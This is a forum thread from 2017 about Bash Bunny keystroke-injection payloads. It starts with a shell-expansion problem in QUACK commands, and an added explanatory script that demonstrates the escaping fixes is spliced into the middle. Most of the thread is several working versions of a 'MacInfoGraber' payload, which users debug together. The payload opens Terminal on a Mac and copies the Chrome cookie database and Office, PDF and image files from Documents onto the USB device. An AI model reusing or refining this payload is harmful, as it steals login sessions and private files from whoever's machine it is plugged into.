anode Posted March 11, 2017
For some reason, when I quack a ~/ it is played back as /root/. ~/ works fine when typed manually in a terminal. I tried simply quacking it into a text editor and got the same result: /root/. Mac OS X 10.9 Mavericks.
edit: Just tried on a Kali laptop, same results. Both machines are bare iron, not VMs.
Edited March 11, 2017 by anode
LowValueTarget Posted March 11, 2017
I would imagine that bash is expanding that path on the BB before it's sent as keystrokes. Try putting your quack strings in a text file and using `QUACK keystrokes.txt`.
anode (author) Posted March 11, 2017
32 minutes ago, LowValueTarget said: I would imagine that bash is expanding that path on the BB before it's sent as keystrokes. Try putting your quack strings in a text file and using `QUACK keystrokes.txt`
Yup, that was it. Saw another post, but it didn't sink in as to why. Makes sense now. Thanks!
audibleblink Posted March 11, 2017
You can also just `\` escape symbols right in the QUACK directive. `QUACK cd $HOME` evaluates to `cd /root`, whereas `QUACK cd \$HOME` literally types `cd $HOME`. This also goes for the ~, ; and | symbols. Check out what I mean in this practical example: https://github.com/hak5/bashbunny-payloads/pull/36
Edited March 11, 2017 by audibleblink
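The expansion problem anode hit, and both workarounds above (a keystrokes file, or backslash escaping), can be reproduced without a Bunny by replacing QUACK with a stub that prints what bash actually handed it. This is an added example, not code from the thread or from the hak5/bashbunny-payloads repository: quack_stub and keystroke_file_stub are stand-ins for the real QUACK function, the HOME=/root assignment mimics the Bunny's root shell, and the notes.txt / copy.txt / listing.txt names are made up for the demonstration.

```shell
#!/bin/sh
# Added example (not from the thread or the hak5 payload repo).
# A Bash Bunny payload.txt is run by bash, so every unquoted word is expanded
# by bash on the Bunny BEFORE the QUACK function (and ducky.py behind it)
# ever sees it. quack_stub stands in for QUACK and just prints the argument
# list it received, which is exactly the text the host keyboard would get.
quack_stub() {
    printf '%s\n' "$*"
}

# Unescaped: ~ is expanded on the Bunny, where HOME is /root (assumed here).
unescaped_tilde() {
    ( HOME=/root; quack_stub cd ~/Documents )      # cd /root/Documents
}

# Backslash-escaped: bash strips the backslash and passes a literal ~.
escaped_tilde() {
    ( HOME=/root; quack_stub cd \~/Documents )     # cd ~/Documents
}

# ">" is a bash redirection, not an argument: the stub sees only
# "cat notes.txt", and bash silently creates copy.txt on the Bunny itself.
unescaped_redirect() {
    (
        d=$(mktemp -d) || exit 1
        cd "$d" || exit 1
        quack_stub cat notes.txt > copy.txt
        cat copy.txt                               # cat notes.txt
        cd / && rm -rf "$d"
    )
}

# Escaping every metacharacter keeps the whole command line intact.
escaped_redirect() {
    quack_stub cat notes.txt \> copy.txt \; exit   # cat notes.txt > copy.txt ; exit
}

# QUACK <file> reads keystrokes from a file. File contents never go through
# bash expansion, so they arrive exactly as written. keystroke_file_stub
# mirrors that by printing the file verbatim.
keystroke_file_stub() {
    cat "$1"
}

keystrokes_from_file() {
    f=$(mktemp) || return 1
    printf 'cd ~/Documents && ls $HOME > listing.txt\n' > "$f"
    keystroke_file_stub "$f"                       # cd ~/Documents && ls $HOME > listing.txt
    rm -f "$f"
}

# Show all five cases side by side when run directly.
demo() {
    unescaped_tilde
    escaped_tilde
    unescaped_redirect
    escaped_redirect
    keystrokes_from_file
}
demo
```

The first and third cases are the two failure modes from the thread: the tilde silently becomes /root, and the redirect never reaches the host at all (it lands in a file on the Bunny). Either escaping or the keystrokes file fixes both; the file approach is the safer default when a line contains several metacharacters.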
Onus Posted March 13, 2017
cd ENTER works too.. I was just playing around with the MacInfoGraber payload by kmakblob, and in order to get it to work I had to change it:

Original:

LED R
ATTACKMODE HID STORAGE
LOOTDIR=/loot/MacLoot
mkdir -p $LOOTDIR

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 8000
QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files
QUACK ENTER
QUACK DELAY 500
QUACK STRING cat ~/Library/Application\ Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd ~/Documents && cp *.xlsx *.xls *.pdf /Volumes/BashBunny/$LOOTDIR/files/
QUACK ENTER
QUACK DELAY 1000
QUACK GUI q
QUACK DELAY 500
QUACK ENTER

# Green LED for finished
LED G

files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l)
files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l)
if [ "$files" != "0" -o "$files2" != "0" ]
then
    # Got spreadsheet files
    LED R B
else
    LED R # No spread sheets
fi

Post fiddles: I had to escape spaces, and even the escape of the escaped space, as well as other special chars to get it to work.. didn't try escaping ~

LED R G 100
ATTACKMODE HID STORAGE
LOOTDIR=loot/MacLoot
mkdir -p $LOOTDIR

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 1000
QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/files
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd
QUACK ENTER
QUACK STRING cd Library/Application\\ Support/Google/Chrome/Default/
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cat Cookies \> /Volumes/BashBunny/$LOOTDIR/chromecookies.db
QUACK DELAY 1000
QUACK ENTER
QUACK STRING cd
QUACK ENTER
QUACK DELAY 1000
QUACK ENTER
QUACK STRING cd Documents
QUACK ENTER
QUACK STRING cp *.xlsx *.xls *.pdf *.jpg /Volumes/BashBunny/$LOOTDIR/files/
#QUACK STRING cp -R Documents/ /Volumes/BashBunny/$LOOTDIR/files/
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cd
#QUACK GUI q
QUACK DELAY 2000
QUACK ENTER

# Green LED for finished
LED G

files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ | grep -v / | wc -l)
QUACK STRING $files
if [ "$files" != "0" ]
then
    # Got files
    LED G
else
    LED R # No files
fi
audibleblink Posted March 13, 2017
Submitted a PR to fix in mainline: https://github.com/hak5/bashbunny-payloads/issues/51

Basic changes:
- fixes lootdir path
- don't capitalize var names that aren't exported
- indentation
- escape shell characters that are passed to QUACK
- account for variable copy times by joining cp and exit commands
- sync the disk

LED G R
ATTACKMODE HID STORAGE
lootdir=loot/MacLoot
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 5000
QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx
QUACK ENTER
QUACK DELAY 500
QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/$lootdir/chromecookies.db
QUACK ENTER
QUACK DELAY 1000
QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal
QUACK ENTER

# Sync filesystem
sync

# Green LED for finished
LED G

Edited March 13, 2017 by audibleblink
Onus Posted March 13, 2017
Wow.. this is almost identical to the changes I have been making since my last comment... Awesome.. (high five) Is the lack of sync why I was never getting a success? If sync fixes this, it might be nice to add back in the logic for the LED at the end indicating whether the files were found/copied..
Edited March 13, 2017 by Onus
audibleblink Posted March 13, 2017
It's still in the GitHub code, I only pasted changes here.
Onus Posted March 13, 2017
Just now, audibleblink said: it's still in the github code, i only pasted changes here.
I gathered that.. I mean the old file didn't sync the file system and always went LED red even when there were files; would this fix that?
Onus Posted March 13, 2017
I just tried removing the kill terminal command so that I can use the terminal to log $files, and editing your script above to look like this after the sync call:

# Sync filesystem
sync

files=$(ls /Volumes/BashBunny/loot/MacLoot/files/ | grep -v / | wc -l)
QUACK STRING $files
QUACK ENTER
if [ "$files" != "0" ]
then
    # Got files
    LED G
else
    LED R # No files
fi

I am perplexed why $files keeps reading as 0 even though I have copied 16 files.. If I run the same line in the terminal myself:

ls /Volumes/BashBunny/loot/MacLoot/files/ | grep -v / | wc -l

I get 16, but the script keeps returning 0. It's stupid bells and whistles.. but damn it, I want to know.
audibleblink Posted March 13, 2017
Is there a `files` folder in MacLoot? I thought it was just the xlsx folder and the cookies db.
Onus Posted March 13, 2017
Sorry.. on mine it's files.. I changed the name as I'm storing more than xls files.. but yes, the folder exists and has files, but $files keeps saying 0.
audibleblink Posted March 13, 2017
I'm wondering if /tools/ducky.py (which is called by QUACK) is running in a subshell. If the QUACK commands run async, then the script is running in its entirety before ever finishing the HID section of the payload. Just a hypothesis; this is where my bash knowledge reaches its limits.